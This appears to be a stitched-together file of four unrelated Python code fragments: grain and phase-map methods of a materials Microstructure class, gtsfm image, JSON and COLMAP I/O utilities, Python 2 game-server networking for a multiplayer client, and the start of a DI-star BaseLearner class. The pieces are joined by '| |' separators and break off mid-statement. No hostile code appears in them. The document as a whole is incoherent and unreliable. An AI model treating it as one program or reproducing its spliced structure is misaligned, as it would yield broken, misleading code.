"""Get a particular grain given its id.
This method browses the microstructure and return the grain
corresponding to the given id. If the grain is not found, the
method raises a `ValueError`.
:param int gid: the grain id.
:return: The method return a new `Grain` instance with the corresponding id.
"""
try:
gr = self.grains.read_where('(idnumber == gid)')[0]
except:
raise ValueError('grain %d not found in the microstructure' % gid)
grain = Grain(gr['idnumber'],
Orientation.from_rodrigues(gr['orientation']))
grain.center = gr['center']
grain.volume = gr['volume']
return grain
def get_all_grains(self):
"""Build a list of `Grain` instances for all grains in this `Microstructure`.
:return: a list of the grains.
"""
grains_list = [self.get_grain(gid)
for gid in self.get_tablecol('GrainDataTable', 'idnumber')]
return grains_list
def get_grain_positions(self):
"""Return all the grain positions as a numpy array of shape (n, 3)
where n is the number of grains.
:return: a numpy array of shape (n, 3) of the grain positions.
"""
return self.grains[:]['center']
def get_grain_volume_fractions(self):
"""Compute all grains volume fractions.
:return: a 1D numpy array with all grain volume fractions.
"""
total_volume = np.sum(self.grains[:]['volume'])
return self.grains[:]['volume'] / total_volume
def get_grain_volume_fraction(self, gid, use_total_volume_value=None):
"""Compute the volume fraction of this grain.
:param int gid: the grain id.
:param float use_total_volume_value: the total volume value to use.
:return float: the grain volume fraction as a number in the range [0, 1].
"""
# compute the total volume
if use_total_volume_value:
total_volume = use_total_volume_value
else:
# sum all the grain volume to compute the total volume
total_volume = np.sum(self.get_grain_volumes())
volume_fraction = self.get_grain_volumes(id_list=[gid])[0] / total_volume
return volume_fraction
def set_orientations(self, orientations):
""" Store grain orientations array in GrainDataTable
orientation : (Ngrains, 3) array of rodrigues orientation vectors
"""
self.set_tablecol('GrainDataTable', 'orientation', column=orientations)
return
def set_centers(self, centers):
""" Store grain centers array in GrainDataTable
centers : (Ngrains, 3) array of grain centers of mass
"""
self.set_tablecol('GrainDataTable', 'center', column=centers)
return
def set_bounding_boxes(self, bounding_boxes):
""" Store grain bounding boxes array in GrainDataTable
"""
self.set_tablecol('GrainDataTable', 'bounding_box', column=bounding_boxes)
return
def set_volumes(self, volumes):
""" Store grain volumes array in GrainDataTable
"""
self.set_tablecol('GrainDataTable', 'volume', column=volumes)
return
def set_lattice(self, lattice, phase_id=None):
"""Set the crystallographic lattice associated with this microstructure.
If no `phase_id` is specified, the lattice will be set for the active
phase.
:param Lattice lattice: an instance of the `Lattice class`.
:param int phase_id: the id of the phase to set the lattice.
"""
if phase_id is None:
phase_id = self.active_phase_id
self.get_phase(phase_id)._lattice = lattice
def set_active_grain_map(self, map_name='grain_map'):
"""Set the active grain map name to inputed string.
The active_grain_map string is used as Name to get the grain_map field
in the dataset through the SampleData "get_field" method.
"""
self.active_grain_map = map_name
self.add_attributes({'active_grain_map':map_name}, 'CellData')
return
def set_grain_map(self, grain_map, voxel_size=None,
map_name='grain_map'):
"""Set the grain map for this microstructure.
:param ndarray grain_map: a 2D or 3D numpy array.
:param float voxel_size: the size of the voxels in mm unit. Used only
if the CellData image Node must be created.
"""
# TODO: ad compression_options
create_image = True
if self.__contains__('CellData'):
empty = self.get_attribute(attrname='empty', nodename='CellData')
if not empty:
create_image = False
if create_image:
if (voxel_size is None):
msg = 'Please specify voxel size for CellData image'
raise ValueError(msg)
if np.isscalar(voxel_size):
dim = len(grain_map.shape)
spacing_array = voxel_size*np.ones((dim,))
else:
if len(voxel_size) != len(grain_map.shape):
raise ValueError('voxel_size array must have a length '
'equal to grain_map shape')
spacing_array = voxel_size
self.add_image_from_field(field_array=grain_map,
fieldname=map_name,
imagename='CellData', location='/',
spacing=spacing_array,
replace=True)
else:
# Handle case of a 2D Microstrucutre: squeeze grain map to
# ensure (Nx,Ny,1) array will be stored as (Nx,Ny)
if self._get_group_type('CellData') == '2DImage':
grain_map = grain_map.squeeze()
self.add_field(gridname='CellData', fieldname=map_name,
array=grain_map, replace=True)
self.set_active_grain_map(map_name)
return
def set_phase_map(self, phase_map, voxel_size=None):
"""Set the phase map for this microstructure.
:param ndarray phase_map: a 2D or 3D numpy array.
:param float voxel_size: the size of the voxels in mm unit. Used only
if the CellData image Node must be created.
"""
# TODO: add compression_options
create_image = True
if self.__contains__('CellData'):
empty = self.get_attribute(attrname='empty', nodename='CellData')
if not empty:
create_image = False
if create_image:
if voxel_size is None:
msg = 'Please specify voxel size for CellData image'
raise ValueError(msg)
if np.isscalar(voxel_size):
dim = len(phase_map.shape)
spacing_array = voxel_size*np.ones((dim,))
else:
if len(voxel_size) != len(phase_map.shape):
raise ValueError('voxel_size array must have a length '
'equal to grain_map shape')
spacing_array = voxel_size
self.add_image_from_field(phase_map, 'phase_map',
imagename='CellData', location='/',
spacing=spacing_array,
replace=True)
else:
self.add_field(gridname='CellData', fieldname='phase_map',
array=phase_map, replace=True,
indexname='phase_map')
def set_mask(self, mask, voxel_size=None):
"""Set the mask for this microstructure.
:param ndarray mask: a 2D or 3D numpy array.
:param float voxel_size: the size of the voxels in mm unit. Used only
if the CellData image Node must be created.
"""
# TODO: add compression_options
create_image = True
if self.__contains__('CellData'):
empty = self.get_attribute(attrname='empty', nodename='CellData')
if not (empty):
create_image = False
if create_image:
if (voxel_size is None):
msg = 'Please specify voxel size for CellData image'
raise ValueError(msg)
if np.isscalar(voxel_size):
dim = len(mask.shape)
spacing_array = voxel_size*np.ones((dim,))
else:
if len(voxel_size) != len(mask.shape):
raise ValueError('voxel_size array must have a length '
'equal to grain_map shape')
spacing_array = voxel_size
self.add_image_from_field(mask, 'mask',
imagename='CellData', location='/',
spacing=spacing_array,
replace=True)
else:
self.add_field(gridname='CellData', fieldname='mask',
array=mask, replace=True, indexname='mask')
return
def set_random_orientations(self):
""" Set random orientations for all grains in GrainDataTable """
for grain in self.grains:
o = Orientation.random()
grain['orientation'] = o.rod
grain.update()
self.grains.flush()
return
def remove_grains_not_in_map(self):
"""Remove from GrainDataTable grains that are not in the grain map."""
_,not_in_map,_ = self.compute_grains_map_table_intersection()
self.remove_grains_from_table(not_in_map)
return
def remove_small_grains(self, min_volume=1.0, sync_table=False,
new_grain_map_name=None):
"""Remove from grain_map and grain data table small volume grains.
Removed grains in grain map will be replaced by background ID (0).
To be sure that the method acts consistently with the current grain
map, activate sync_table options.
:param float min_volume: Grains whose volume is under or equal to this
value willl be suppressed from grain_map and grain data table.
:param bool sync_table: If `True`, synchronize gran data table with
grain map before removing grains.
:param str new_grain_map_name: If provided, store the new grain map
with removed grain with this new name. If not, overright the
current active grain map
"""
if sync_table and not self._is_empty('grain_map'):
self.sync_grain_table_with_grain_map(sync_geometry=True)
condition = f"(volume <= {min_volume})"
id_list = self.grains.read_where(condition)['idnumber']
if not self._is_empty('grain_map'):
# Remove grains from grain map
grain_map = self.get_grain_map()
grain_map[np.where(np.isin(grain_map,id_list))] = 0
if new_grain_map_name is not None:
map_name = new_grain_map_name
else:
map_name = self.active_grain_map
self.set_grain_map(grain_map.squeeze(), map_name=map_name)
# Remove grains from table
self.remove_grains_from_table(id_list)
return
def remove_grains_from_table(self, ids):
"""Remove from GrainDataTable the grains with given ids.
:param ids: Array of grain ids to remove from GrainDataTable
:type ids: list
"""
for Id in ids:
where = self.grains.get_where_list('idnumber == Id')[:]
self.grains.remove_row(int(where))
return
def add_grains(self, euler_list, grain_ids=None):
"""A a list of grains to this microstructure.
This function adds a list of grains represented by a list of Euler
angles triplets, to the microstructure. If provided, the `grain_ids`
list will be used for the grain ids.
:param list euler_list: the list of euler angles (Bunge passive convention).
:param list grain_ids: an optional list for the ids of the new grains.
"""
grain = self.grains.row
# build a | |
"""Functions to provide I/O APIs for all the modules.
Authors: <NAME>, <NAME>
"""
import json
import os
import pickle
from bz2 import BZ2File
from pathlib import Path
from typing import Any, Dict, List, Optional, Tuple, Union
import gtsam
import h5py
import numpy as np
from gtsam import Cal3Bundler, Rot3, Pose3
from PIL import Image as PILImage
from PIL.ExifTags import GPSTAGS, TAGS
import gtsfm.utils.images as image_utils
import gtsfm.utils.logger as logger_utils
import gtsfm.utils.reprojection as reproj_utils
from gtsfm.common.gtsfm_data import GtsfmData
from gtsfm.common.image import Image
from gtsfm.common.sfm_track import SfmTrack2d
logger = logger_utils.get_logger()
def load_image(img_path: str) -> Image:
"""Load the image from disk.
Notes: EXIF is read as a map from (tag_id, value) where tag_id is an integer.
In order to extract human-readable names, we use the lookup table TAGS or GPSTAGS.
Images will be converted to RGB if in a different format.
Args:
img_path (str): the path of image to load.
Returns:
loaded image in RGB format.
"""
original_image = PILImage.open(img_path)
exif_data = original_image._getexif()
if exif_data is not None:
parsed_data = {}
for tag_id, value in exif_data.items():
# extract the human readable tag name
if tag_id in TAGS:
tag_name = TAGS.get(tag_id)
elif tag_id in GPSTAGS:
tag_name = GPSTAGS.get(tag_id)
else:
tag_name = tag_id
parsed_data[tag_name] = value
exif_data = parsed_data
img_fname = Path(img_path).name
original_image = original_image.convert("RGB") if original_image.mode != "RGB" else original_image
return Image(value_array=np.asarray(original_image), exif_data=exif_data, file_name=img_fname)
def save_image(image: Image, img_path: str) -> None:
"""Saves the image to disk
Args:
image (np.array): image
img_path (str): the path on disk to save the image to
"""
im = PILImage.fromarray(image.value_array)
im.save(img_path)
def load_h5(file_path: str) -> Dict[Any, Any]:
"""Loads a dictionary from a h5 file
Args:
file_path: path of the h5 file
Returns:
the dictionary from the h5 file
"""
data = {}
with h5py.File(file_path, "r") as f:
for key in f.keys():
data[key] = f[key][:]
return data
def save_json_file(
json_fpath: str,
data: Union[Dict[Any, Any], List[Any]],
) -> None:
"""Save a Python dictionary or list to a JSON file.
Args:
json_fpath: Path to file to create.
data: Python dictionary or list to be serialized.
"""
os.makedirs(os.path.dirname(json_fpath), exist_ok=True)
with open(json_fpath, "w") as f:
json.dump(data, f, indent=4)
def read_json_file(fpath: Union[str, Path]) -> Any:
"""Load dictionary from JSON file.
Args:
fpath: Path to JSON file.
Returns:
Deserialized Python dictionary or list.
"""
with open(fpath, "r") as f:
return json.load(f)
def read_bal(file_path: str) -> GtsfmData:
"""Read a Bundle Adjustment in the Large" (BAL) file.
See https://grail.cs.washington.edu/projects/bal/ for more details on the format.
Args:
file_name: file path of the BAL file.
Returns:
The data as an GtsfmData object.
"""
sfm_data = gtsam.readBal(file_path)
num_images = sfm_data.number_cameras()
gtsfm_data = GtsfmData(num_images)
for i in range(num_images):
camera = sfm_data.camera(i)
gtsfm_data.add_camera(i, camera)
for j in range(sfm_data.number_tracks()):
gtsfm_data.add_track(sfm_data.track(j))
return gtsfm_data
def export_model_as_colmap_text(gtsfm_data: GtsfmData, images: List[Image], save_dir: str) -> None:
"""Emulates the COLMAP option to `Export model as text`.
Three text files will be save to disk: "points3D.txt", "images.txt", and "cameras.txt".
Args:
gtsfm_data: scene data to write.
images: list of all images for this scene, in order of image index.
save_dir: folder where text files will be saved.
"""
write_cameras(gtsfm_data, images, save_dir)
write_images(gtsfm_data, images, save_dir)
write_points(gtsfm_data, images, save_dir)
def read_cameras_txt(fpath: str) -> Optional[List[Cal3Bundler]]:
"""Read camera calibrations from a COLMAP-formatted cameras.txt file.
Reference: https://colmap.github.io/format.html#cameras-txt
Args:
fpaths: path to cameras.txt file
Returns:
calibration object for each camera, or None if requested file is non-existent
"""
if not Path(fpath).exists():
logger.info("%s does not exist", fpath)
return None
with open(fpath, "r") as f:
lines = f.readlines()
# may not be one line per camera (could be only one line of text if shared calibration)
num_cams = int(lines[2].replace("# Number of cameras: ", "").strip())
calibrations = []
for line in lines[3:]:
cam_params = line.split()
# Note that u0 is px, and v0 is py
cam_id, model, img_w, img_h, fx, u0, v0 = cam_params[:7]
img_w, img_h, fx, u0, v0 = int(img_w), int(img_h), float(fx), float(u0), float(v0)
# TODO: determine convention for storing/reading radial distortion parameters
k1 = 0
k2 = 0
calibrations.append(Cal3Bundler(fx, k1, k2, u0, v0))
assert len(calibrations) == num_cams
return calibrations
def write_cameras(gtsfm_data: GtsfmData, images: List[Image], save_dir: str) -> None:
"""Writes the camera data file in the COLMAP format.
Reference: https://colmap.github.io/format.html#cameras-txt
Args:
gtsfm_data: scene data to write.
images: list of all images for this scene, in order of image index
save_dir: folder to put the cameras.txt file in.
"""
os.makedirs(save_dir, exist_ok=True)
# TODO: handle shared intrinsics
camera_model = "SIMPLE_RADIAL"
file_path = os.path.join(save_dir, "cameras.txt")
with open(file_path, "w") as f:
f.write("# Camera list with one line of data per camera:\n")
f.write("# CAMERA_ID, MODEL, WIDTH, HEIGHT, PARAMS[]\n")
# note that we save the number of etimated cameras, not the number of input images,
# which would instead be gtsfm_data.number_images().
f.write(f"# Number of cameras: {len(gtsfm_data.get_valid_camera_indices())}\n")
for i in gtsfm_data.get_valid_camera_indices():
camera = gtsfm_data.get_camera(i)
calibration = camera.calibration()
fx = calibration.fx()
u0 = calibration.px()
v0 = calibration.py()
k1 = calibration.k1()
k2 = calibration.k2()
image_height = images[i].height
image_width = images[i].width
f.write(f"{i} {camera_model} {image_width} {image_height} {fx} {u0} {v0} {k1} {k2}\n")
def read_images_txt(fpath: str) -> Tuple[Optional[List[Pose3]], Optional[List[str]]]:
"""Read camera poses and image file names from a COLMAP-format images.txt file.
Reference: https://colmap.github.io/format.html#images-txt
"The coordinates of the projection/camera center are given by -R^t * T, where
R^t is the inverse/transpose of the 3x3 rotation matrix composed from the
quaternion and T is the translation vector. The local camera coordinate system
of an image is defined in a way that the X axis points to the right, the Y axis
to the bottom, and the Z axis to the front as seen from the image."
Args:
fpath: path to images.txt file
Returns:
wTi_list: list of camera poses for each image, or None if file path invalid
img_fnames: name of image file, for each image, or None if file path invalid
"""
if not Path(fpath).exists():
logger.info("%s does not exist", fpath)
return None, None
with open(fpath, "r") as f:
lines = f.readlines()
wTi_list = []
img_fnames = []
# ignore first 4 lines of text -- they contain a description of the file format
# and a record of the number of reconstructed images.
for line in lines[4::2]:
i, qw, qx, qy, qz, tx, ty, tz, i, img_fname = line.split()
# Colmap provides extrinsics, so must invert
iRw = Rot3(float(qw), float(qx), float(qy), float(qz))
wTi = Pose3(iRw, np.array([tx, ty, tz], dtype=np.float64)).inverse()
wTi_list.append(wTi)
img_fnames.append(img_fname)
return wTi_list, img_fnames
def write_images(gtsfm_data: GtsfmData, images: List[Image], save_dir: str) -> None:
"""Writes the image data file in the COLMAP format.
Reference: https://colmap.github.io/format.html#images-txt
Note: the "Number of images" saved to the .txt file is not the number of images
fed to the SfM algorithm, but rather the number of localized camera poses/images,
which COLMAP refers to as the "reconstructed cameras".
Args:
gtsfm_data: scene data to write.
images: list of all images for this scene, in order of image index.
save_dir: folder to put the images.txt file in.
"""
os.makedirs(save_dir, exist_ok=True)
num_imgs = gtsfm_data.number_images()
# TODO: compute this (from keypoint data? or from track data?)
mean_obs_per_img = 0
file_path = os.path.join(save_dir, "images.txt")
with open(file_path, "w") as f:
f.write("# Image list with two lines of data per image:\n")
f.write("# IMAGE_ID, QW, QX, QY, QZ, TX, TY, TZ, CAMERA_ID, NAME\n")
f.write("# POINTS2D[] as (X, Y, POINT3D_ID)\n")
f.write(f"# Number of images: {num_imgs}, mean observations per image: {mean_obs_per_img}\n")
for i in gtsfm_data.get_valid_camera_indices():
img_fname = images[i].file_name
camera = gtsfm_data.get_camera(i)
# COLMAP exports camera extrinsics (cTw), not the poses (wTc), so must invert
iTw = camera.pose().inverse()
iRw_quaternion = iTw.rotation().quaternion()
itw = iTw.translation()
tx, ty, tz = itw
qw, qx, qy, qz = iRw_quaternion
f.write(f"{i} {qw} {qx} {qy} {qz} {tx} {ty} {tz} {i} {img_fname}\n")
# TODO: write out the points2d
f.write("TODO\n")
def read_points_txt(fpath: str) -> Tuple[Optional[np.ndarray], Optional[np.ndarray]]:
"""Read 3d points and their associated colors from a COLMAP points.txt file.
Reference: https://colmap.github.io/format.html#points3d-txt
Args:
fpath: absolute file path to points.txt file
Returns:
point_cloud: float array of shape (N,3)
rgb: uint8 array of shape (N,3)
"""
if not Path(fpath).exists():
logger.info("%s does not exist", fpath)
return None, None
with open(fpath, "r") as f:
data = f.readlines()
rgb = []
point_cloud = []
# first 3 lines are information about the file format
# line at index 2 will be of | |
not None:
udpdatas = self.dynamic_compress(udpdata)
else:
udpdatas = [udpdata]
for udpdata in udpdatas:
try:
self.udpsockcounter += self.udpsocket.send(udpdata)
except error, e:
print >> sys.stderr, 'ignored:', str(e)
pass # ignore UDP send errors (buffer full, etc.)
if self.has_music > 1 and NOW >= self.musicstreamer:
self.musicstreamer += 0.99
self.sendmusicdata()
if not self.msgl:
if abs(NOW - self.activity) <= self.KEEP_ALIVE:
if abs(NOW - self.last_ping) <= self.force_ping_delay:
return
if self.udpsockcounter < 1024:
return
self.force_ping_delay += 0.2
self.msgl.append(message(MSG_PING, self.udpsockcounter>>10))
self.last_ping = NOW
def setup_dyncompress(self):
def dyncompress():
# See comments in pclient.Playfield.dynamic_decompress().
threads = []
for t in range(3):
co = zlib.compressobj(6)
threads.append((chr(0x88 + t) + chr(t), co))
frame = 0
globalsync = 0
while 1:
# write three normal packets, one on each thread
for t in range(3):
head, co = threads.pop(0)
yield head + chr(frame), co
threads.append((chr(ord(head[0]) & 0x87) + chr(frame), co))
yield None, None
frame = (frame + 1) & 0xFF
# sync frame, write two packets (on two threads)
# and restart compression at the current frame for these threads
head, co = threads.pop(0)
yield head + chr(frame), co
co1 = zlib.compressobj(6)
co2 = zlib.compressobj(6)
globalsync += 1
if globalsync == 4:
# next on this thread will be a global sync packet
nextframe = (frame + 2) & 0xFF
globalsync = 0
else:
# next of this thread will be a local sync packet
yield None, co1
nextframe = frame
threads.append((chr(ord(head[0]) | 8) + chr(nextframe), co1))
# 2nd packet of the current frame
head, co = threads.pop(0)
yield head + chr(frame), co
yield None, co2
threads.append((chr(ord(head[0]) | 8) + chr(frame), co2))
yield None, None
frame = (frame + 1) & 0xFF
self.dyncompress = dyncompress()
def dynamic_compress(self, framedata):
result = []
for head, co in self.dyncompress:
if not co:
return result
data = [head, co.compress(framedata), co.flush(zlib.Z_SYNC_FLUSH)]
if head:
result.append(''.join(data))
def send_can_mix(self):
return not self.msgl and self.socket is not None
def send_buffer(self, buffer):
try:
count = self.socket.send(buffer[:self.SEND_BOUND_PER_FRAME])
except error, e:
if e.args[0] != EWOULDBLOCK:
self.msgl = []
self.initialdata = ""
self.disconnect(e, 'emit')
return
else:
#g = open('log', 'ab'); g.write(buffer[:count]); g.close()
buffer = buffer[count:]
self.activity = NOW
if self.initialdata:
self.initialdata = buffer
elif buffer:
self.msgl = [buffer]
else:
self.msgl = []
def receive(self, data):
#print "receive:", `data`
try:
data = self.buf + data
while data:
values, data = decodemessage(data)
if not values:
break # incomplete message
fn = self.MESSAGES.get(values[0])
if fn:
fn(self, *values[1:])
else:
print "unknown message from", self.addr, ":", values
self.buf = data
except struct.error:
import traceback
traceback.print_exc()
self.socket.send('\n\n<h1>Protocol Error</h1>\n')
hs = findsocket('HTTP')
if hs is not None:
url = 'http://%s:%s' % (HOSTNAME, displaysockport(hs))
self.socket.send('''
If you meant to point your web browser to this server,
then use the following address:
<a href="%s">%s</a>
''' % (url, url))
self.disconnect('protocol error', 'receive')
def input_handler(self):
try:
data = self.socket.recv(2048)
except error, e:
self.disconnect(e, "socket.recv")
else:
if data:
self.activity = NOW
self.receive(data)
elif not hasattr(self.socket, 'RECV_CAN_RETURN_EMPTY'):
# safecheck that this means disconnected
iwtd, owtd, ewtd = select([self.socket], [], [], 0.0)
if self.socket in iwtd:
self.disconnect('end of data', 'socket.recv')
def disconnect(self, err=None, infn=None):
removesocket('CLIENT', self.socket)
if err:
extra = ": " + str(err)
else:
extra = ""
if infn:
extra += " in " + infn
print 'Disconnected by', self.addr, extra
self.log('disconnected' + extra)
for p in self.players.values():
p._playerleaves()
try:
del broadcast_clients[self]
except KeyError:
pass
clients.remove(self)
try:
self.socket.close()
except:
pass
self.socket = None
if not clients and game is not None:
game.FnDisconnected()
def killplayer(self, player):
for id, p in self.players.items():
if p is player:
framemsgappend(message(MSG_PLAYER_KILL, id))
del self.players[id]
if game:
game.updateplayers()
def joinplayer(self, id, *rest):
if self.players.has_key(id):
print "Note: player %s is already playing" % (self.addr+(id,),)
return
if game is None:
return # refusing new player before the game starts
p = game.FnPlayers()[id]
if p is None:
print "Too many players. New player %s refused." % (self.addr+(id,),)
self.msgl.append(message(MSG_PLAYER_KILL, id))
elif p.isplaying():
print "Note: player %s is already played by another client" % (self.addr+(id,),)
else:
print "New player %s" % (self.addr+(id,),)
p._client = self
p.playerjoin()
p.setplayername('')
self.players[id] = p
game.updateplayers()
for c in clients:
c.msgl.append(message(MSG_PLAYER_JOIN, id, c is self))
def remove_player(self, id, *rest):
try:
p = self.players[id]
except KeyError:
print "Note: player %s is not playing" % (self.addr+(id,),)
else:
p._playerleaves()
def set_player_name(self, id, name, *rest):
p = game.FnPlayers()[id]
p.setplayername(name)
def set_udp_port(self, port, addr=None, *rest):
if port == MSG_BROADCAST_PORT:
self.log('set_udp_port: broadcast')
broadcast_clients[self] = 1
#print "++++ Broadcasting ++++ to", self.addr
else:
try:
del broadcast_clients[self]
except KeyError:
pass
if port == MSG_INLINE_FRAME or port == 0:
# client requests data in-line on the TCP stream
self.dyncompress = None
import udpovertcp
self.udpsocket = udpovertcp.SocketMarshaller(self.socket, self)
s = self.udpsocket.tcpsock
self.log('set_udp_port: udp-over-tcp')
else:
try:
if hasattr(self.socket, 'udp_over_udp_mixer'):
# for SocketOverUdp
self.udpsocket = self.socket.udp_over_udp_mixer()
else:
self.udpsocket = socket(AF_INET, SOCK_DGRAM)
self.udpsocket.setblocking(0)
addr = addr or self.addr[0]
self.udpsocket.connect((addr, port))
except error, e:
print >> sys.stderr, "Cannot set UDP socket to", addr, str(e)
self.udpsocket = None
self.udpsockcounter = sys.maxint
else:
if self.proto >= 3:
self.setup_dyncompress()
s = self.udpsocket
self.log('set_udp_port: %s:%d' % (addr, port))
if s:
try:
s.setsockopt(SOL_IP, IP_TOS, 0x10) # IPTOS_LOWDELAY
except error, e:
print >> sys.stderr, "Cannot set IPTOS_LOWDELAY:", str(e)
def enable_sound(self, sound_mode=1, *rest):
if sound_mode != self.has_sound:
self.sounds = {}
self.has_sound = sound_mode
if self.has_sound > 0:
for snd in samples.values():
snd.defall(self)
#self.log('enable_sound %s' % sound_mode)
def enable_music(self, mode, *rest):
if mode != self.has_music:
self.has_music = mode
self.startmusic()
#self.log('enable_music')
def startmusic(self):
if self.has_music:
self.musicstreamer = time()
for cde in currentmusics[1:]:
if cde not in self.musicpos:
msgl, self.musicpos[cde] = music_by_id[cde].initialsend(self)
self.msgl += msgl
if self.has_music > 1:
self.sendmusicdata()
self.msgl.append(message(MSG_PLAY_MUSIC, *currentmusics))
def sendmusicdata(self):
for cde in currentmusics[1:]:
if self.musicpos[cde] is not None:
msgl, self.musicpos[cde] = music_by_id[cde].clientsend(self.musicpos[cde])
self.msgl += msgl
return
def ping(self, *rest):
if self.initialized < 2:
# send all current bitmap data
self.initialized = 2
for b in bitmaps.values():
b.defall(self)
self.finishinit(game)
for id, p in game.FnPlayers().items():
if p.standardplayericon is not None:
self.msgl.append(message(MSG_PLAYER_ICON, id, p.standardplayericon.code))
self.msgl.append(message(MSG_PONG, *rest))
def finishinit(self, game):
pass
def pong(self, *rest):
pass
def log(self, message):
print self.addr, message
def protocol_version(self, version, *rest):
self.proto = version
def md5_data_request(self, fileid, position, size, *rest):
data = filereaders[fileid]((position, size))
data = zlib.compress(data)
self.msgl.append(message(MSG_ZPATCH_FILE, fileid, position, data))
## def def_file(self, filename, md5sum):
## fnp = []
## while filename:
## filename, tail = os.path.split(filename)
## fnp.insert(0, tail)
## if fnp[:len(FnBasePath)] == FnBasePath:
## filename = os.path.join(*fnp[len(FnBasePath):])
## self.known_files[filename] = md5sum
MESSAGES = {
CMSG_PROTO_VERSION: protocol_version,
CMSG_ADD_PLAYER : joinplayer,
CMSG_REMOVE_PLAYER: remove_player,
CMSG_UDP_PORT : set_udp_port,
CMSG_ENABLE_SOUND : enable_sound,
CMSG_ENABLE_MUSIC : enable_music,
CMSG_PING : ping,
CMSG_PONG : pong,
CMSG_DATA_REQUEST : md5_data_request,
CMSG_PLAYER_NAME : set_player_name,
## CMSG_DEF_FILE : def_file,
}
class SimpleClient(Client):
def finishinit(self, game):
num = 0
for keyname, icolist, fn in game.FnKeys:
self.msgl.append(message(MSG_DEF_KEY, keyname, num,
*[ico.code for ico in icolist]))
num += 1
def cmsg_key(self, pid, keynum):
if game is not None:
try:
player = self.players[pid]
fn = game.FnKeys[keynum][2]
except (KeyError, IndexError):
game.FnUnknown()
else:
getattr(player, fn) ()
MESSAGES = Client.MESSAGES.copy()
MESSAGES.update({
CMSG_KEY: cmsg_key,
})
MAX_CLIENTS = 32
clients = []
FnClient = SimpleClient
broadcast_clients = {}
filereaders = {}
bitmaps = {}
samples = {}
music_by_id = {}
currentmusics = [0]
sprites = ['']
sprites_by_n = {}
recording = None
game = None
serversockets = {}
socketsbyrole = {}
socketports = {}
def framemsgappend(msg):
for c in clients:
c.msgl.append(msg)
if recording:
recording.write(msg)
##def sndframemsgappend(msg):
## for c in clients:
## if c.has_sound:
## c.msgl.append(msg)
def set_udp_port(port):
hostchooser.UDP_PORT = port
def has_loop_music():
return currentmusics[0] < len(currentmusics)-1
def finalsegment(music1, music2):
intro1 = music1[1:1+music1[0]]
intro2 = music2[1:1+music2[0]]
loop1 = music1[1+music1[0]:]
loop2 = music2[1+music2[0]:]
return loop1 == loop2 and intro1 == intro2[len(intro2)-len(intro1):]
def set_musics(musics_intro, musics_loop, reset=1):
mlist = []
loop_from = len(musics_intro)
mlist.append(loop_from)
for m in musics_intro + musics_loop:
mlist.append(m.fileid)
reset = reset or not finalsegment(mlist, currentmusics)
currentmusics[:] = mlist
if reset:
for c in clients:
c.startmusic()
def fadeout(time=1.0):
msg = message(MSG_FADEOUT, int(time*1000))
for c in clients:
if c.has_music > 1:
c.msgl.append(msg)
currentmusics[:] = [0]
def getbitmap(filename, colorkey=None):
try:
return bitmaps[filename]
except:
bmp = Bitmap(len(bitmaps), filename, colorkey)
bitmaps[filename] = bmp
return bmp
def getsample(filename, freqfactor=1):
try:
return samples[filename, freqfactor]
except:
snd = Sample(len(samples), filename, freqfactor)
samples[filename, freqfactor] = snd
return snd
def getmusic(filename, filerate=44100):
try:
return samples[filename]
except:
mus = Music(filename, filerate)
samples[filename] = mus
music_by_id[mus.fileid] = mus
return mus
def newbitmap(data, | |
<reponame>XinyuJing/DI-star<filename>ctools/worker/learner/base_learner.py
"""
Copyright 2020 <NAME>. All Rights Reserved
Main Function:
1. base class for model learning
"""
import os
from abc import ABC, abstractmethod
from typing import Any, Union, Callable
from functools import partial
from easydict import EasyDict
import torch
from ctools.data import default_collate
from ctools.data.new_dataloader import AsyncDataLoader
from ctools.torch_utils import build_checkpoint_helper, CountVar, auto_checkpoint, build_log_buffer, to_device
from ctools.utils import build_logger, dist_init, EasyTimer, dist_finalize, pretty_print, read_config, \
get_task_uid, import_module, broadcast
from ctools.utils import deep_merge_dicts
from .comm import LearnerCommHelper
from .learner_hook import build_learner_hook_by_cfg, add_learner_hook, merge_hooks, LearnerHook
default_config = read_config(os.path.join(os.path.dirname(__file__), "base_learner_default_config.yaml"))
class BaseLearner(ABC):
r"""
Overview:
base class for model learning(SL/RL), which is able to multi-GPU learning
Interface:
__init__, register_stats, run, close, call_hook, info, save_checkpoint, launch
Property:
last_iter, optimizer, lr_scheduler, computation_graph, agent, log_buffer, record,
load_path, save_path, checkpoint_manager, name, rank, tb_logger, use_distributed
"""
_name = "BaseLearner" # override this variable for sub-class learner
def __init__(self, cfg: EasyDict) -> None:
"""
Overview:
initialization method, load config setting and call ``_init`` for actual initialization,
set the communication mode to `single_machine` or `flask_fs`.
Arguments:
- cfg (:obj:`EasyDict`): learner config, you can view `cfg <../../../configuration/index.html>`_ for ref.
Notes:
if you want to debug in sync CUDA mode, please use the following line code in the beginning of ``__init__``.
.. code:: python
os.environ['CUDA_LAUNCH_BLOCKING'] = "1" # for debug async CUDA
"""
self._cfg = deep_merge_dicts(default_config, cfg)
self._init()
if self._cfg.learner.communication.type == 'single_machine':
self._logger.info("Single machine learner has launched")
else:
comm_cfg = self._cfg.learner.communication
LearnerCommHelper.enable_comm_helper(self, comm_cfg)
self._logger.info("Distributed learner has launched")
def _init(self) -> None:
"""
Overview:
Use ``self._cfg`` setting to build common learner components, such as dataset, runtime agent,
optimizer, lr_scheduler, logger helper, checkpoint helper.
"""
self._learner_worker_uid = get_task_uid()
self._load_path = self._cfg.common.load_path
self._save_path = self._cfg.common.save_path
self._use_cuda = self._cfg.learner.use_cuda
self._use_distributed = self._cfg.learner.use_distributed
self._learner_uid = self._cfg.learner.learner_uid
if self._use_distributed:
self._rank, self._world_size = dist_init()
else:
self._rank, self._world_size = 0, 1
if self._use_cuda:
self._device = torch.cuda.current_device()
else:
self._device = 'cpu'
self._default_max_iterations = self._cfg.learner.max_iterations
self._timer = EasyTimer()
# logger
self._logger, self._tb_logger, self._record = build_logger(self._cfg, rank=self._rank)
self._log_buffer = build_log_buffer()
# checkpoint helper
self._checkpointer_manager = build_checkpoint_helper(self._cfg)
self._hooks = {'before_run': [], 'before_iter': [], 'after_iter': [], 'after_run': []}
self._collate_fn = default_collate
def launch(self) -> None:
"""
Overview:
launch learner runtime components, each train job means a launch operation,
job related dataloader, agent, computation_graph, optimizer and hook support.
"""
self._setup_dataloader()
self._setup_agent()
self._setup_optimizer()
self._setup_computation_graph()
self._last_iter = CountVar(init_val=0)
if self._rank == 0:
self.register_stats()
self.info(
pretty_print(
{
"config": self._cfg,
"agent": repr(self._agent),
"computation_graph": repr(self._computation_graph)
},
direct_print=False
)
)
self._setup_wrapper()
self._setup_hook()
def _setup_hook(self) -> None:
"""
Overview:
